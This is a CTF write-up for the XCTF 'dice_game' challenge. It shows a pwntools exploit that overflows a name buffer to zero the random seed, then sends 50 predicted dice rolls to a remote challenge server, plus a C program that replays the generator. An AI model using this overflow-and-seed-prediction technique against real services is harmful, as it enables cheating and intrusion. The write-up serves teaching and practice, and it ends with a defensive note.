dice_game
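Challenge source: XCTF 4th-QCTF-2018
Challenge description: none yet
First, use the stack overflow to overwrite seed with 0, which makes the random sequence deterministic. Then write a C program to generate the rand results and feed them to the game.
The exp is as follows: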
```python
from pwn import *

# io = gdb.debug('./dice_game', 'b *$rebase(0xB99)')
# io = process('./dice_game')
io = remote('111.200.241.244', 63482)

# 64 bytes of padding, then 8 zero bytes that overwrite seed with 0
io.recvuntil(b'Welcome, let me know your name: ')
payload = b'a' * 64 + p64(0)
io.send(payload)

# Rolls the game produces once seed is 0
game_ans = [2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5, 6, 3, 4, 4, 3,
            3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5, 4, 4, 4, 6, 3, 2, 3, 3, 6, 1]
for i in range(50):
    io.recvuntil(b'Give me the point(1~6): ')
    io.sendline(str(game_ans[i]).encode())

io.interactive()
```
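The C program mentioned in the solution steps, as an added example that is not part of the original writeup: it replays the generator with a known seed and compares the result against the writeup's game_ans. It assumes the game calls srand(seed) once and computes each roll as rand() % 6 + 1, and that it is built against the same libc as the target (glibc assumed); the function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

#define ROUNDS 50

/* game_ans copied from the exploit script in this writeup. */
static const int page_ans[ROUNDS] = {
    2, 5, 4, 2, 6, 2, 5, 1, 4, 2, 3, 2, 3, 2, 6, 5, 1, 1, 5, 5, 6, 3, 4, 4, 3,
    3, 3, 2, 2, 2, 6, 1, 1, 1, 6, 4, 2, 5, 2, 5, 4, 4, 4, 6, 3, 2, 3, 3, 6, 1};

/* Assumption: the game calls srand(seed) once and rolls rand() % 6 + 1. */
void predict_rolls(unsigned int seed, int out[ROUNDS]) {
    srand(seed);
    for (int i = 0; i < ROUNDS; i++)
        out[i] = rand() % 6 + 1;
}

/* Returns 1 if two seeds yield the same 50 rolls, else 0. */
int same_sequence(unsigned int a, unsigned int b) {
    int x[ROUNDS], y[ROUNDS];
    predict_rolls(a, x);
    predict_rolls(b, y);
    for (int i = 0; i < ROUNDS; i++)
        if (x[i] != y[i]) return 0;
    return 1;
}

/* Rounds where the prediction equals game_ans, or -1 if a roll leaves 1..6.
   A full match requires the same rand() implementation as the target. */
int matches_page(unsigned int seed) {
    int r[ROUNDS], n = 0;
    predict_rolls(seed, r);
    for (int i = 0; i < ROUNDS; i++) {
        if (r[i] < 1 || r[i] > 6) return -1;
        n += (r[i] == page_ans[i]);
    }
    return n;
}

int main(void) {
    int r[ROUNDS];
    predict_rolls(0, r);
    for (int i = 0; i < ROUNDS; i++)
        printf("%d%s", r[i], i + 1 < ROUNDS ? ", " : "\n");
    printf("rounds matching game_ans: %d/%d\n", matches_page(0), ROUNDS);
    return 0;
}
```

The roll sequence is a pure function of the seed, so a game that keeps the seed where user input cannot reach it, or draws rolls from a CSPRNG, does not have this predictability.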